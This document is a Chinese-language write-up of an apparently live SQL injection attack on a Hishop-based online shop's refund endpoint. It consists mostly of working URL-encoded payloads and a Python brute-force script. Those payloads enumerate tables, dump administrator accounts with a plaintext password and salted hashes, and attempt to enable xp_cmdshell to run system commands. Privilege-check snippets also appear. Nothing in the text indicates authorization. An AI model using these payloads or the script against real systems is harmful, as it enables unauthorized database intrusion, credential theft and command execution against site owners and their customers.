0x00 发现
目标使用hishop,查看历史漏洞发现一处注入:
http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20@@version)%3E0%20and%20%271%27=%271
db_name():xxxshop017
user:xxxx017
@@servername:XXXSHOP
0x01 郁闷的爆表名
那就开始爆xxxshop017的表吧
http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(%27Hishop_HelpCategories%27))%3E0%20and%20%271%27=%271
/×
也可以利用information_schema爆表
http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20table_name%20from%20information_schema.tables%20);–
×/
写个脚本跑表
#coding:utf-8 #Author:LSA #Description:hishop sqli for /user/UserRefundApply?OrderId= #Date:20190701 import sys import requests from bs4 import BeautifulSoup import re headers = { 'Cookie': '', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36' } global tables_name tables_name = "'Hishop_HelpCategories'" #print tables_name def brute_tables(url): for i in range(0,300): url = 'http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(' + tables_name + '))%3E0%20and%20%271%27=%271' print url rsp = requests.get(url,headers=headers) soup = BeautifulSoup(rsp.text,"lxml") title = soup.title.string #print title table_name = re.findall(r"'(.*?)'",title) #print table_name[0] global tables_name tables_name = tables_name + ',\'' + table_name[0] + '\'' #print tables_name print tables_name def main(url): brute_tables(url) if __name__ == '__main__': url = 'http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(' + tables_name + '))%3E0%20and%20%271%27=%271' main(url)
郁闷开始了,竟然报错了!
经测试,是因为url长度超过2093返回404了,利用burp和chrome都是相同情况,目标系统iis8.5+.net4,在使用相同hishop的另外一个网站(iis7.5)测试不会404……
猜测可能是运维修改了IIS最大url长度,但是可能性非常低!
无奈,利用xml path爆吧
利用xml path()爆所有表
http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=convert(int,(select%20quotename(name)%20from%20xxxshop017..sysobjects%20where%20xtype=%27U%27%20FOR%20XML%20PATH(%27%27)))%20and%20%271%27=%271
由于表名太多,最后出现省略号,无法爆完所有表。
那就利用not in分两次爆,把第一次用xml path爆出来的表名加入not in。
http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27%20and%201=CONVERT(INT,(select%20quotename(name)%20from%20xxxshop017..sysobjects%20where%20xtype=%27U%27%20and%20name%20not%20in%20(%27Hishop_HelpCategories%27,%27Hishop_Hotkeywords%27,%27Hishop_OrderDailyStatistics%27,%27Hishop_CountDownSku%27,%27Hishop_Helps%27,%27Hishop_NavMenu%27,%27Hishop_Gifts%27,%27Hishop_ProductConsultations%27,%27Hishop_MessageTemplates%27,%27CustomMade_Logs%27,%27Hishop_FriendlyLinks%27,%27Hishop_ProductAttributes%27,%27Hishop_MessageContent%27,%27Hishop_FightGroupActivities%27,%27Hishop_PointDetails%27,%27Hishop_MemberMessageBox%27,%27Hishop_FavoriteTags%27,%27Hishop_InpourRequest%27,%27Hishop_ExpressTemplates%27,%27Hishop_ManagerMessageBox%27,%27Hishop_SKUMemberPrice%27,%27Hishop_EmailQueue%27,%27Hishop_SKUItems%27,%27Hishop_DeliveryScope%27,%27Hishop_MenuClickRecords%27,%27Hishop_UserShippingAddresses%27,%27Hishop_DailyAccessStatistics%27,%27Hishop_Logs%27,%27Hishop_ShoppingCarts%27,%27Hishop_Coupons%27,%27Hishop_IntegrationSettings%27,%27Hishop_ProductPreSale%27,%27Hishop_GiftShoppingCarts%27,%27Hishop_PhotoGallery%27,%27Hishop_PromotionRegions%27,%27Hishop_ProductDailyAccessStatistics%27,%27Hishop_Favorite%27,%27Hishop_PhotoCategories%27,%27Hishop_MarketingImages%27,%27Hishop_PhoneCodeIPs%27,%27Hishop_PhoneCodeEveryDayTimes%27,%27Hishop_PrivilegeInRoles%27,%27aspnet_Referrals%27,%27Hishop_PaymentTypes%27,%27Hishop_ProductSpecificationImages%27,%27aspnet_MemberOpenIds%27,%27Hishop_Orders%27,%27Hishop_Products%27,%27Hishop_BalanceDrawRequest%27,%27aspnet_Roles%27,%27Hishop_Shippers%27,%27Hishop_BalanceDetails%27,%27ChangeStockLog%27,%27Hishop_Service%27,%27aspnet_MemberGrades%27,%27Hishop_RelatedProducts%27,%27aspnet_OpenIdSettings%27,%27Custom_Etickets%27,%27Hishop_RelatedArticsProducts%27,%27aspnet_MemberWXShoppingGuider%27,%27Hishop_Regions%27,%27aspnet_MemberWXReferral%27,%27Custom_EticketsResult%27,%27Hishop_RedEnvelopeSendRecord%27,%27aspnet_MemberTags%27,%27Hishop_RedEnvelopeGetRecord%27,%27Hishop_CombinationBuySKU%27)FOR%20XML%20PATH(%27%27)))%20and%20%271%27=%271
0x02 获取列名和数据
判断管理员帐号密码可能在
aspnet_Members或aspnet_Managers这两个表中
先看aspnet_Members
http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20*%20from%20xxxshop017..aspnet_Members%20FOR%20XML%20PATH(%27%27))–
得到帐号admin密码xxx2018@
利用where、not in可以获取多个数据
有些帐号的密码经过了加密(疑似RSA)
<Password>dNPQ/7vfChaeOmCL7Wb8mRmRq9U=</Password><PasswordSalt>5pk/VC1CM8ARImoqpquGpg==</PasswordSalt>
再看看aspnet_Managers
http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20*%20from%20xxxshop017..aspnet_Managers%20FOR%20XML%20PATH(%27%27))–
密码base16/32/64无法解密
疑似经过了rsa加密。
利用admin xxx2018@登录失败。
猜测可能是数据库不对,尝试爆所有数据库。
利用xml paht()爆所有库
http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27%20and%20(select%20quotename(name)%20from%20master..sysdatabases%20FOR%20XML%20PATH(%27%27))%3E0%20and%20%271%27=%271
得到可能存在帐号密码的数据库(域名是mall)
[xxxmall]
尝试跨库查询
http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%201=convert(int,(select%20quotename(name)%20from%20xxxmall..sysobjects%20where%20xtype=%27U%27%20FOR%20XML%20PATH(%27%27)))%20and%20%271%27=%271
没权限。。。。。。
尝试利用存储过程。
开启存储过程
http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27;EXEC%20sp_configure%20%27show%20advanced%20options%27,%201;RECONFIGURE;EXEC%20sp_configure%20%27xp_cmdshell%27,%201;RECONFIGURE;–
尝试执行whoami
http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27;exec%20master..xp_cmdshell%20%22whoami%22;–
尝试列目录
http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27;execute%20master..xp_dirtree%20%27C:%27;–
黔驴技穷。。。。。。
0x03 其他
判断权限
and 1=(select IS_SRVROLEMEMBER(‘sysadmin’)) //判断是否是系统管理员
and 1=(Select IS_MEMBER(‘db_owner’)) //判断是否是库权限
and 1=(select is_srvrolemember(‘sysadmin’))
and 1=(select is_srvrolemember(‘serveradmin’))
and 1=(select is_srvrolemember(‘setupadmin’))
and 1=(select is_srvrolemember(‘securityadmin’))
and 1=(select is_srvrolemember(‘diskadmin’))
and 1=(select is_srvrolemember(‘bulkadmin’))
sqlmap –privileges
–privileges -U xxx017
判断表是否存在
http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20(Select%20Count(*)%20from%20Hishop_PaymentaTypes)%3E0%20and%20%271%27=%271
or
http://mall.xxx.com.cn/user/UserRefundApply?OrderId=%27%20and%20exists(select%20*%20from%20aspnet_Referralsa)%20and%20%271%27=%271
爆列
http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27and%201=CONVERT(INT,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=%27aspnet_roles%27))--
获取数据
http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27%20and%201=CONVERT(INT,(select%20top%201%20rolename%20from%20aspnet_roles))-- http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20*%20from%20aspnet_Referrals%20where%20userid!=1123%20FOR%20XML%20PATH(%27%27))-- http://mall.xxx.com.cn/USER/UserRefundApply?OrderId=%27%20and%201=(select%20top%201%20*%20from%20aspnet_Referrals%20where%20userid!=1123%20and%20userid%20not%20in%20(%277448%27)%20FOR%20XML%20PATH(%27%27))--